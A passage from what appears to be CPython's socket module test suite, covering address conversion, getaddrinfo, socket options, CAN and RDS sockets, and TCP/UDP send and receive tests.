assertInvalid('::1.2.3.4:0')
assertInvalid('0.100.200.0:3:4:5:6:7:8')
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv4(self):
from socket import inet_ntoa as f, inet_ntop, AF_INET
g = lambda a: inet_ntop(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
assertInvalid(f, b'\x00' * 3)
assertInvalid(f, b'\x00' * 5)
assertInvalid(f, b'\x00' * 16)
self.assertEqual('170.85.170.85', f(bytearray(b'\xaa\x55\xaa\x55')))
self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
assertInvalid(g, b'\x00' * 3)
assertInvalid(g, b'\x00' * 5)
assertInvalid(g, b'\x00' * 16)
self.assertEqual('170.85.170.85', g(bytearray(b'\xaa\x55\xaa\x55')))
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv6(self):
try:
from socket import inet_ntop, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_ntop(AF_INET6, b'\x00' * 16)
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_ntop(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual('::', f(b'\x00' * 16))
self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
self.assertEqual(
'aef:b01:506:1001:ffff:9997:55:170',
f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
)
self.assertEqual('::1', f(bytearray(b'\x00' * 15 + b'\x01')))
assertInvalid(b'\x12' * 15)
assertInvalid(b'\x12' * 17)
assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...
def testSockName(self):
# Testing getsockname()
port = support.find_unused_port()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.bind(("0.0.0.0", port))
name = sock.getsockname()
# XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate
# it reasonable to get the host's addr in addition to 0.0.0.0.
# At least for eCos. This is required for the S/390 to pass.
try:
my_ip_addr = socket.gethostbyname(socket.gethostname())
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
self.assertEqual(name[1], port)
def testGetSockOpt(self):
# Testing getsockopt()
# We know a socket should start without reuse==0
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse != 0, "initial mode is reuse")
def testSetSockOpt(self):
# Testing setsockopt()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse == 0, "failed to set reuse mode")
def testSendAfterClose(self):
# testing send() after close() with timeout
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
sock.close()
self.assertRaises(OSError, sock.send, b"spam")
def testNewAttributes(self):
# testing .family, .type and .protocol
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.assertEqual(sock.family, socket.AF_INET)
if hasattr(socket, 'SOCK_CLOEXEC'):
self.assertIn(sock.type,
(socket.SOCK_STREAM | socket.SOCK_CLOEXEC,
socket.SOCK_STREAM))
else:
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
sock.close()
def test_getsockaddrarg(self):
sock = socket.socket()
self.addCleanup(sock.close)
port = support.find_unused_port()
big_port = port + 65536
neg_port = port - 65536
self.assertRaises(OverflowError, sock.bind, (HOST, big_port))
self.assertRaises(OverflowError, sock.bind, (HOST, neg_port))
# Since find_unused_port() is inherently subject to race conditions, we
# call it a couple times if necessary.
for i in itertools.count():
port = support.find_unused_port()
try:
sock.bind((HOST, port))
except OSError as e:
if e.errno != errno.EADDRINUSE or i == 5:
raise
else:
break
@unittest.skipUnless(os.name == "nt", "Windows specific")
def test_sock_ioctl(self):
self.assertTrue(hasattr(socket.socket, 'ioctl'))
self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
self.assertTrue(hasattr(socket, 'RCVALL_ON'))
self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
s = socket.socket()
self.addCleanup(s.close)
self.assertRaises(ValueError, s.ioctl, -1, None)
s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
def testGetaddrinfo(self):
try:
socket.getaddrinfo('localhost', 80)
except socket.gaierror as err:
if err.errno == socket.EAI_SERVICE:
# see http://bugs.python.org/issue1282647
self.skipTest("buggy libc version")
raise
# len of every sequence is supposed to be == 5
for info in socket.getaddrinfo(HOST, None):
self.assertEqual(len(info), 5)
# host can be a domain name, a string representation of an
# IPv4/v6 address or None
socket.getaddrinfo('localhost', 80)
socket.getaddrinfo('127.0.0.1', 80)
socket.getaddrinfo(None, 80)
if support.IPV6_ENABLED:
socket.getaddrinfo('::1', 80)
# port can be a string service name such as "http", a numeric
# port number or None
socket.getaddrinfo(HOST, "http")
socket.getaddrinfo(HOST, 80)
socket.getaddrinfo(HOST, None)
# test family and socktype filters
infos = socket.getaddrinfo(HOST, 80, socket.AF_INET, socket.SOCK_STREAM)
for family, type, _, _, _ in infos:
self.assertEqual(family, socket.AF_INET)
self.assertEqual(str(family), 'AddressFamily.AF_INET')
self.assertEqual(type, socket.SOCK_STREAM)
self.assertEqual(str(type), 'SocketKind.SOCK_STREAM')
infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
for _, socktype, _, _, _ in infos:
self.assertEqual(socktype, socket.SOCK_STREAM)
# test proto and flags arguments
socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
# a server willing to support both IPv4 and IPv6 will
# usually do this
socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
# test keyword arguments
a = socket.getaddrinfo(HOST, None)
b = socket.getaddrinfo(host=HOST, port=None)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, socket.AF_INET)
b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
type=socket.SOCK_STREAM, proto=0,
flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
# Issue #6697.
self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
# Issue 17269: test workaround for OS X platform bug segfault
if hasattr(socket, 'AI_NUMERICSERV'):
try:
# The arguments here are undefined and the call may succeed
# or fail. All we care here is that it doesn't segfault.
socket.getaddrinfo("localhost", None, 0, 0, 0,
socket.AI_NUMERICSERV)
except socket.gaierror:
pass
def test_getnameinfo(self):
# only IP addresses are allowed
self.assertRaises(OSError, socket.getnameinfo, ('mail.python.org',0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
'network is not enabled')
def test_idna(self):
# Check for internet access before running test
# (issue #12804, issue #25138).
with support.transient_internet('python.org'):
socket.gethostbyname('python.org')
# these should all be successful
domain = 'испытание.pythontest.net'
socket.gethostbyname(domain)
socket.gethostbyname_ex(domain)
socket.getaddrinfo(domain,0,socket.AF_UNSPEC,socket.SOCK_STREAM)
# this may not work if the forward lookup choses the IPv6 address, as that doesn't
# have a reverse entry yet
# socket.gethostbyaddr('испытание.python.org')
def check_sendall_interrupted(self, with_timeout):
# socketpair() is not strictly required, but it makes things easier.
if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
self.skipTest("signal.alarm and socket.socketpair required for this test")
# Our signal handlers clobber the C errno by calling a math function
# with an invalid domain value.
def ok_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
def raising_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
1 // 0
c, s = socket.socketpair()
old_alarm = signal.signal(signal.SIGALRM, raising_handler)
try:
if with_timeout:
# Just above the one second minimum for signal.alarm
c.settimeout(1.5)
with self.assertRaises(ZeroDivisionError):
signal.alarm(1)
c.sendall(b"x" * support.SOCK_MAX_SIZE)
if with_timeout:
signal.signal(signal.SIGALRM, ok_handler)
signal.alarm(1)
self.assertRaises(socket.timeout, c.sendall,
b"x" * support.SOCK_MAX_SIZE)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_alarm)
c.close()
s.close()
def test_sendall_interrupted(self):
self.check_sendall_interrupted(False)
def test_sendall_interrupted_with_timeout(self):
self.check_sendall_interrupted(True)
def test_dealloc_warn(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r = repr(sock)
with self.assertWarns(ResourceWarning) as cm:
sock = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# An open socket file object gets dereferenced after the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f = sock.makefile('rb')
r = repr(sock)
sock = None
support.gc_collect()
with self.assertWarns(ResourceWarning):
f = None
support.gc_collect()
def test_name_closed_socketio(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
fp = sock.makefile("rb")
fp.close()
self.assertEqual(repr(fp), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
with socket.socket() as sock:
fp = sock.makefile("rb", buffering=0)
self.assertTrue(fp.readable())
self.assertFalse(fp.writable())
self.assertFalse(fp.seekable())
fp.close()
self.assertRaises(ValueError, fp.readable)
self.assertRaises(ValueError, fp.writable)
self.assertRaises(ValueError, fp.seekable)
def test_makefile_mode(self):
for mode in 'r', 'rb', 'rw', 'w', 'wb':
with self.subTest(mode=mode):
with socket.socket() as sock:
with sock.makefile(mode) as fp:
self.assertEqual(fp.mode, mode)
def test_makefile_invalid_mode(self):
for mode in 'rt', 'x', '+', 'a':
with self.subTest(mode=mode):
with socket.socket() as sock:
with self.assertRaisesRegex(ValueError, 'invalid mode'):
sock.makefile(mode)
def test_pickle(self):
sock = socket.socket()
with sock:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertRaises(TypeError, pickle.dumps, sock, protocol)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
family = pickle.loads(pickle.dumps(socket.AF_INET, protocol))
self.assertEqual(family, socket.AF_INET)
type = pickle.loads(pickle.dumps(socket.SOCK_STREAM, protocol))
self.assertEqual(type, socket.SOCK_STREAM)
def test_listen_backlog(self):
for backlog in 0, -1:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen(backlog)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen()
@support.cpython_only
def test_listen_backlog_overflow(self):
# Issue 15989
import _testcapi
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.bind((HOST, 0))
self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
srv.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
self.assertRaises(OverflowError, socket.getnameinfo,
(support.HOSTv6, 0, 0xffffffff), 0)
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
self.assertRaises(OverflowError, s.bind, (support.HOSTv6, 0, -10))
def test_str_for_enums(self):
# Make sure that the AF_* and SOCK_* constants have enum-like string
# reprs.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
self.assertEqual(str(s.family), 'AddressFamily.AF_INET')
self.assertEqual(str(s.type), 'SocketKind.SOCK_STREAM')
@unittest.skipIf(os.name == 'nt', 'Will not work on Windows')
def test_uknown_socket_family_repr(self):
# Test that when created with a family that's not one of the known
# AF_*/SOCK_* constants, socket.family just returns the number.
#
# To do this we fool socket.socket into believing it already has an
# open fd because on this path it doesn't actually verify the family and
# type and populates the socket object.
#
# On Windows this trick won't work, so the test is skipped.
fd, _ = tempfile.mkstemp()
with socket.socket(family=42424, type=13331, fileno=fd) as s:
self.assertEqual(s.family, 42424)
self.assertEqual(s.type, 13331)
@unittest.skipUnless(hasattr(os, 'sendfile'), 'test needs os.sendfile()')
def test__sendfile_use_sendfile(self):
class File:
def __init__(self, fd):
self.fd = fd
def fileno(self):
return self.fd
with socket.socket() as sock:
fd = os.open(os.curdir, os.O_RDONLY)
os.close(fd)
with self.assertRaises(socket._GiveupOnSendfile):
sock._sendfile_use_sendfile(File(fd))
with self.assertRaises(OverflowError):
sock._sendfile_use_sendfile(File(2**1000))
with self.assertRaises(TypeError):
sock._sendfile_use_sendfile(File(None))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_RAW
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCMConstants(self):
socket.CAN_BCM
# opcodes
socket.CAN_BCM_TX_SETUP # create (cyclic) transmission task
socket.CAN_BCM_TX_DELETE # remove (cyclic) transmission task
socket.CAN_BCM_TX_READ # read properties of (cyclic) transmission task
socket.CAN_BCM_TX_SEND # send one CAN frame
socket.CAN_BCM_RX_SETUP # create RX content filter subscription
socket.CAN_BCM_RX_DELETE # remove RX content filter subscription
socket.CAN_BCM_RX_READ # read properties of RX content filter subscription
socket.CAN_BCM_TX_STATUS # reply to TX_READ request
socket.CAN_BCM_TX_EXPIRED # notification on performed transmissions (count=0)
socket.CAN_BCM_RX_STATUS # reply to RX_READ request
socket.CAN_BCM_RX_TIMEOUT # cyclic message is absent
socket.CAN_BCM_RX_CHANGED # updated CAN frame (detected content change)
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testCreateBCMSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM) as s:
pass
def testBindAny(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.bind(('', ))
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
self.assertRaisesRegex(OSError, 'interface name too long',
s.bind, ('x' * 1024,))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
'socket.CAN_RAW_LOOPBACK required for this test.')
def testLoopback(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
for loopback in (0, 1):
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
loopback)
self.assertEqual(loopback,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
'socket.CAN_RAW_FILTER required for this test.')
def testFilter(self):
can_id, can_mask = 0x200, 0x700
can_filter = struct.pack("=II", can_id, can_mask)
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
self.assertEqual(can_filter,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, bytearray(can_filter))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
@unittest.skipUnless(thread, 'Threading required for this test.')
class CANTest(ThreadedCANSocketTest):
def __init__(self, methodName='runTest'):
ThreadedCANSocketTest.__init__(self, methodName=methodName)
@classmethod
def build_can_frame(cls, can_id, data):
"""Build a CAN frame."""
can_dlc = len(data)
data = data.ljust(8, b'\x00')
return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)
@classmethod
def dissect_can_frame(cls, frame):
"""Dissect a CAN frame."""
can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
return (can_id, can_dlc, data[:can_dlc])
def testSendFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
self.assertEqual(addr[0], self.interface)
self.assertEqual(addr[1], socket.AF_CAN)
def _testSendFrame(self):
self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
self.cli.send(self.cf)
def testSendMaxFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
def _testSendMaxFrame(self):
self.cf = self.build_can_frame(0x00, b'\x07' * 8)
self.cli.send(self.cf)
def testSendMultiFrames(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf1, cf)
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf2, cf)
def _testSendMultiFrames(self):
self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
self.cli.send(self.cf1)
self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
self.cli.send(self.cf2)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def _testBCM(self):
cf, addr = self.cli.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
can_id, can_dlc, data = self.dissect_can_frame(cf)
self.assertEqual(self.can_id, can_id)
self.assertEqual(self.data, data)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCM(self):
bcm = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)
self.addCleanup(bcm.close)
bcm.connect((self.interface,))
self.can_id = 0x123
self.data = bytes([0xc0, 0xff, 0xee])
self.cf = self.build_can_frame(self.can_id, self.data)
opcode = socket.CAN_BCM_TX_SEND
flags = 0
count = 0
ival1_seconds = ival1_usec = ival2_seconds = ival2_usec = 0
bcm_can_id = 0x0222
nframes = 1
assert len(self.cf) == 16
header = struct.pack(self.bcm_cmd_msg_fmt,
opcode,
flags,
count,
ival1_seconds,
ival1_usec,
ival2_seconds,
ival2_usec,
bcm_can_id,
nframes,
)
header_plus_frame = header + self.cf
bytes_sent = bcm.send(header_plus_frame)
self.assertEqual(bytes_sent, len(header_plus_frame))
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_RDS
socket.PF_RDS
def testCreateSocket(self):
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
pass
def testSocketBufferSize(self):
bufsize = 16384
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
@unittest.skipUnless(thread, 'Threading required for this test.')
class RDSTest(ThreadedRDSSocketTest):
def __init__(self, methodName='runTest'):
ThreadedRDSSocketTest.__init__(self, methodName=methodName)
def setUp(self):
super().setUp()
self.evt = threading.Event()
def testSendAndRecv(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
self.assertEqual(self.cli_addr, addr)
def _testSendAndRecv(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testPeek(self):
data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
self.assertEqual(self.data, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testPeek(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
@requireAttrs(socket.socket, 'recvmsg')
def testSendAndRecvMsg(self):
data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
self.assertEqual(self.data, data)
@requireAttrs(socket.socket, 'sendmsg')
def _testSendAndRecvMsg(self):
self.data = b'hello ' * 10
self.cli.sendmsg([self.data], (), 0, (HOST, self.port))
def testSendAndRecvMulti(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data1, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data2, data)
def _testSendAndRecvMulti(self):
self.data1 = b'bacon'
self.cli.sendto(self.data1, 0, (HOST, self.port))
self.data2 = b'egg'
self.cli.sendto(self.data2, 0, (HOST, self.port))
def testSelect(self):
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testSelect(self):
self.data = b'select'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testCongestion(self):
# wait until the sender is done
self.evt.wait()
def _testCongestion(self):
# test the behavior in case of congestion
self.data = b'fill'
self.cli.setblocking(False)
try:
# try to lower the receiver's socket buffer size
self.cli.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 16384)
except OSError:
pass
with self.assertRaises(OSError) as cm:
try:
# fill the receiver's socket buffer
while True:
self.cli.sendto(self.data, 0, (HOST, self.port))
finally:
# signal the receiver we're done
self.evt.set()
# sendto() should have failed with ENOBUFS
self.assertEqual(cm.exception.errno, errno.ENOBUFS)
# and we should have received a congestion notification through poll
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
@unittest.skipUnless(thread, 'Threading required for this test.')
class BasicTCPTest(SocketConnectedTest):
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecv(self):
# Testing large receive over TCP
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.serv_conn.send(MSG)
def testOverFlowRecv(self):
# Testing receive in chunks over TCP
seg1 = self.cli_conn.recv(len(MSG) - 3)
seg2 = self.cli_conn.recv(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecv(self):
self.serv_conn.send(MSG)
def testRecvFrom(self):
# Testing large recvfrom() over TCP
msg, addr = self.cli_conn.recvfrom(1024)
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.serv_conn.send(MSG)
def testOverFlowRecvFrom(self):
# Testing recvfrom() in chunks over TCP
seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
seg2, addr = self.cli_conn.recvfrom(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecvFrom(self):
self.serv_conn.send(MSG)
def testSendAll(self):
# Testing sendall() with a 2048 byte string over TCP
msg = b''
while 1:
read = self.cli_conn.recv(1024)
if not read:
break
msg += read
self.assertEqual(msg, b'f' * 2048)
def _testSendAll(self):
big_chunk = b'f' * 2048
self.serv_conn.sendall(big_chunk)
def testFromFd(self):
# Testing fromfd()
fd = self.cli_conn.fileno()
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
self.assertIsInstance(sock, socket.socket)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testFromFd(self):
self.serv_conn.send(MSG)
def testDup(self):
# Testing dup()
sock = self.cli_conn.dup()
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDup(self):
self.serv_conn.send(MSG)
def testShutdown(self):
# Testing shutdown()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
# wait for _testShutdown to finish: on OS X, when the server
# closes the connection the client also becomes disconnected,
# and the client's shutdown call will fail. (Issue #4397.)
self.done.wait()
def _testShutdown(self):
self.serv_conn.send(MSG)
self.serv_conn.shutdown(2)
testShutdown_overflow = support.cpython_only(testShutdown)
@support.cpython_only
def _testShutdown_overflow(self):
import _testcapi
self.serv_conn.send(MSG)
# Issue 15989
self.assertRaises(OverflowError, self.serv_conn.shutdown,
_testcapi.INT_MAX + 1)
self.assertRaises(OverflowError, self.serv_conn.shutdown,
2 + (_testcapi.UINT_MAX + 1))
self.serv_conn.shutdown(2)
def testDetach(self):
# Testing detach()
fileno = self.cli_conn.fileno()
f = self.cli_conn.detach()
self.assertEqual(f, fileno)
# cli_conn cannot be used anymore...
self.assertTrue(self.cli_conn._closed)
self.assertRaises(OSError, self.cli_conn.recv, 1024)
self.cli_conn.close()
# ...but we can create another socket using the (still open)
# file descriptor
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDetach(self):
self.serv_conn.send(MSG)
@unittest.skipUnless(thread, 'Threading required for this test.')
class BasicUDPTest(ThreadedUDPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPSocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
# Testing sendto() and Recv() over UDP
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDP
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
# Base class for sendmsg()/recvmsg() tests.
# Time in seconds to wait before considering a test failed, or
# None for no timeout. Not all tests actually set a timeout.
fail_timeout = 3.0
def setUp(self):
self.misc_event = threading.Event()
super().setUp()
def sendToServer(self, msg):
# Send msg to the server.
return self.cli_sock.send(msg)
# Tuple of alternative default arguments for sendmsg() when called
# via sendmsgToServer() (e.g. to include a destination address).
sendmsg_to_server_defaults = ()
def sendmsgToServer(self, *args):
# Call sendmsg() on self.cli_sock with the given arguments,
# filling in any arguments which are not supplied with the
# corresponding items of self.sendmsg_to_server_defaults, if
# any.
return self.cli_sock.sendmsg(
*(args + self.sendmsg_to_server_defaults[len(args):]))
def doRecvmsg(self, sock, bufsize, *args):
# Call recvmsg() on sock with given arguments and return its
# result. Should be used for tests which can use either
# recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
# this method with one which emulates it using recvmsg_into(),
# thus allowing the same test to be used for both methods.
result = sock.recvmsg(bufsize, *args)
self.registerRecvmsgResult(result)
return result
def registerRecvmsgResult(self, result):
# Called by doRecvmsg() with the return value of recvmsg() or
# recvmsg_into(). Can be overridden to arrange cleanup based
# on the returned ancillary data, for instance.
pass
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer.
self.assertEqual(addr1, addr2)
# Flags that are normally unset in msg_flags
msg_flags_common_unset = 0
for name in ("MSG_CTRUNC", "MSG_OOB"):
msg_flags_common_unset |= getattr(socket, name, 0)
# Flags that are normally set
msg_flags_common_set = 0
# Flags set when a complete record has been received (e.g. MSG_EOR
# for SCTP)
msg_flags_eor_indicator = 0
# Flags set when a complete record has not been received
# (e.g. MSG_TRUNC for datagram sockets)
msg_flags_non_eor_indicator = 0
def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
# Method to check the value of msg_flags returned by recvmsg[_into]().
#
# Checks that all bits in msg_flags_common_set attribute are
# set in "flags" and all bits in msg_flags_common_unset are
# unset.
#
